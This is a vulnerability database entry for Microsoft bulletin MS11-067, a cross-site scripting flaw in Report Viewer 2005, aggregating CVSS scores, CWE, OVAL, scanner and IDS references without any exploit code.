Executive Summary



This Alert is flagged as TOP 25 Common Weakness Enumeration from CWE/SANS. For more information, you can read this.
Summary
Title Vulnerability in Microsoft Report Viewer Could Allow Information Disclosure (2578230)
Informations
Name MS11-067 First vendor Publication 2011-08-09
Vendor Microsoft Last vendor Modification 2012-03-13
Severity (Vendor) Important Revision 1.1

Security-Database Scoring CVSS v3

Cvss vector : N/A
Overall CVSS Score NA
Base Score NA Environmental Score NA
impact SubScore NA Temporal Score NA
Exploitabality Sub Score NA
 
Calculate full CVSS 3.0 Vectors scores

Security-Database Scoring CVSS v2

Cvss vector : (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Cvss Base Score 4.3 Attack Range Network
Cvss Impact Score 2.9 Attack Complexity Medium
Cvss Expoit Score 8.6 Authentication None Required
Calculate full CVSS 2.0 Vectors scores

Detail

Revision Note: V1.1 (March 13, 2012): Added an entry to the update FAQ to announce a detection change for KB2548826 to correct an installation issue. This is a detection change only. There were no changes to the security update files. Customers who have already successfully updated their systems do not need to take any action.

Summary: This security update resolves a privately reported vulnerability in Microsoft Report Viewer. The vulnerability could allow information disclosure if a user views a specially crafted Web page. In all cases, however, an attacker would have no way to force a user to visit the Web site. Instead, an attacker would have to persuade a user to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes the user to the vulnerable Web site.

Original Source

Url : http://technet.microsoft.com/en-us/security/bulletin/ms11-067

CWE : Common Weakness Enumeration

% Id Name
100 % CWE-79 Failure to Preserve Web Page Structure ('Cross-site Scripting') (CWE/SANS Top 25)

OVAL Definitions

Definition Id: oval:org.mitre.oval:def:12773
 
Oval ID: oval:org.mitre.oval:def:12773
Title: Report Viewer Controls XSS Vulnerability
Description: Cross-site scripting (XSS) vulnerability in the Report Viewer Control in Microsoft Visual Studio 2005 SP1 and Report Viewer 2005 SP1 allows remote attackers to inject arbitrary web script or HTML via a parameter in a data source, aka "Report Viewer Controls XSS Vulnerability."
Family: windows Class: vulnerability
Reference(s): CVE-2011-1976
Version: 7
Platform(s): Microsoft Windows XP
Microsoft Windows Vista
Microsoft Windows 7
Microsoft Windows Server 2003
Microsoft Windows Server 2008
Microsoft Windows Server 2008 R2
Product(s): Microsoft Visual Studio 2005
Microsoft Report Viewer 2005
Definition Synopsis:

CPE : Common Platform Enumeration

TypeDescriptionCount
Application 2
Application 1

OpenVAS Exploits

Date Description
2011-08-11 Name : Microsoft Report Viewer Information Disclosure Vulnerability (2578230)
File : nvt/secpod_ms11-067.nasl

Open Source Vulnerability Database (OSVDB)

Id Description
74396 Microsoft Report Viewer Control Unspecified XSS

Microsoft Report Viewer contains a flaw that allows a remote cross-site scripting (XSS) attack. This flaw exists because the application does not validate certain unspecified input passed to the Microsoft Report Viewer control before returning it to the user. This may allow a user to create a specially crafted URL that would execute arbitrary script code in a user's browser within the trust relationship between their browser and the server.

Information Assurance Vulnerability Management (IAVM)

Date Description
2011-08-11 IAVM : 2011-B-0099 - Microsoft Report Viewer Information Disclosure Vulnerability
Severity : Category II - VMSKEY : V0029780

Snort® IPS/IDS

Date Description
2014-01-10 Microsoft Report Viewer reflect XSS attempt
RuleID : 19681 - Revision : 5 - Type : OS-WINDOWS

Nessus® Vulnerability Scanner

Date Description
2011-08-09 Name : The remote Windows host contains a web control that could allow information d...
File : smb_nt_ms11-067.nasl - Type : ACT_GATHER_INFO

Alert History

If you want to see full details history, please login or register.
0
1
2
Date Informations
2014-02-17 11:47:05
  • Multiple Updates
2014-01-19 21:30:43
  • Multiple Updates
2013-11-11 12:41:24
  • Multiple Updates